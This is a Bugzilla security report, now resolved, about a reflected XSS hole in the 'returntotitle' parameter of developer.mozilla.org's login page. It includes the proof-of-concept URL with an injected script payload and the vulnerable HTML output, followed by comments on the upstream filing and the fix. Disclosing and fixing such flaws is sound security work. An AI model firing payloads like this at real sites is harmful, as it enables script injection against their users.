Closed
Bug 505335
Opened 15 years ago
Closed 15 years ago
XSS vuln in 'returntotitle' parameter on Special:UserLogin page
Categories
(developer.mozilla.org Graveyard :: General, defect)
developer.mozilla.org Graveyard
General
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: reed, Assigned: royk)
References
()
Details
(Keywords: wsec-xss)
Found by hyperscan https://developer.mozilla.org/index.php?title=Special:UserLogin&returntotitle="><script>alert('xss');</script> <div id="page-top"><div id="pageToc"><div class="pageToc"><h5>Table of contents</h5></div></div><div class="pageText" id="pageText"><div id="pageTypeSpecial"><form method="post" action="/Special:UserLogin" class="user-login"><fieldset><input type="hidden" value="1" name="auth_id" id="hidden-auth_id" autocomplete="off" /><div class="field"><label for="text-username">Username</label> <input type="text" value="" name="username" tabindex="1" size="24" spellcheck="false" class="input-text" id="text-username" autocomplete="off" /><div class="create-account"><a href="/Special:UserRegistration">Create an account</a></div></div><input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" /><div class="field"><label for="password-password">Password</label> <input type="password" name="password" tabindex="2" size="24" spellcheck="false" class="input-password" id="password-password" autocomplete="off" /><div class="forgot-password"><a href="/Special:UserPassword">Forgot password?</a></div></div><button type="submit" name="deki_buttons[action][login]" value="login" tabindex="3" class="input-button"><span>Login</span></button></form></div></div></div><div class="printfooter" id="printfooter"><hr /> Specifically, <input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" />
Reporter | ||
Comment 1•15 years ago
|
||
Filed upstream as http://bugs.developer.mindtouch.com/view.php?id=6833.
Reporter | ||
Comment 2•15 years ago
|
||
Attachment 389574 [details] [diff] includes a fix for this bug.
Reporter | ||
Comment 3•15 years ago
|
||
Patch resolved the issue.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Reporter | ||
Updated•15 years ago
|
Assignee: nobody → royk
Updated•12 years ago
|
Component: Deki Infrastructure → Other
Comment 5•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Comment 6•8 years ago
|
||
For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.
Group: websites-security
Updated•4 years ago
|
Product: developer.mozilla.org → developer.mozilla.org Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•